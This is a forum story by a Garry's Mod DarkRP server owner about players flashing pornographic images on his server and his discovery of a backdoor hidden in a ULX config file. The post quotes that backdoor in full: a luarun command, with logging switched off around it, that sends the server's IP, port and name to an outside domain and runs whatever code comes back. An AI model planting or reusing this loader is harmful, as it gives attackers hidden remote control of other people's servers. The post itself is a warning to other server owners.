Server hackers??? Oh great, just another clickbaity thread about a 12 year old kid complaining about scripters.
Well, not exactly.
This is a story time, so get settled in.
A little bit about me; I'm currently an independent developer/owner of a Garry's Mod DarkRP server with moderate coding knowledge, really enough to get me by. Been working on this server for the past month, and this is the first time
(and hopefully last time) this happens to me.
It's just an average day on the server, everything's quiet, but then we receive an unexpected spike in players. Mostly minges because of being a new server, but non the less, still players. This seemed quite promising because it had been empty the past week. Everyone's just doing their own things, and I feel like its break time since I had been working non-stop for a couple of hours, so I get up to go eat some food. I'm standing there in my kitchen, enjoying my food, when my friend who was playing on my server turns to me with a worried look on his face and says "We're getting hacked."
Oh , what?! No way, this can't happen. I had a feeling...Thoughts started racing through my head, and so I finished up quickly and went to my computer. There on my screen is an image of graphic pornographic material flashing on my screen. Everyone was complaining about it on the server, so I was quite concerned.
My garry's mod runs in fullscreen, so definitely couldn't be another application causing this. I've heard about this one other time and I thought it wasn't real. Oh boy was I wrong! Since the pornographic image was flashing constantly, I decide it's investigation time.
While on the server, I search through my console, the server's chat history, and all the players to find the troublesome players. Turns out, a few individuals were involved. I found who I thought to be the main troublemaker, named "in0xia" along with a possibly malicious URL, mostly because my friend had ULX banned him multiple times but never actually got kicked, so I decided to start taking action. I went straight to an addon that allows me to grab user's IP addresses, and ULX IPBanned (through a ULX addon) the player, and he finally disconnected. I also attempted banning a player called 'b a n k s y' but even when server echoed that he was ULX banned, he was still right in front of my face. in0xia was instantly able to rejoin the server, so since ban wasn't working, I started crashing both of their clients every time they attempted to join the server. Before any more destruction could be caused, I pulled the plug on the server.
I frantically started searching through all my files looking for possible backdoors, and one of the first file paths I searched through was ULX. I found not a backdoor, not a command, but ~35,000 lines of code! Under data/ulx/config.txt, I found some code that forced ULX to include a function that fetches the server's IP address, hostport, and name and sends it off to a server.
ulx luarun "function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end"
There was also code before and after the above code that disabled ulx logecho before the function was executed and re-enabled ulx logecho after the function was finished.
I went to the website inside the http.Fetch and it returns with 'This is for servers only...'
https://xn--vxao.pw/tracker.php?port=
No luck.
So I decided to head to just the domain itself, and it linked to:
https://xn--vxao.pw/
JACKPOT!!In that website included multiple contact information, including their twitter, discord, and steam! I decided to head straight to the steam profile, and what do I know, it's one of the players causing the trouble on my server!
I still haven't pinpointed where it makes the pornographic images to flash on the screen, but I figured letting all you all know that this isn't an 'urban legend of gmod' or whatever would be useful. I'd highly advise that you ban their SteamID's before they even get on your server, because then you too might have porn spammed on all your users' screens and possibly have worse happen to you.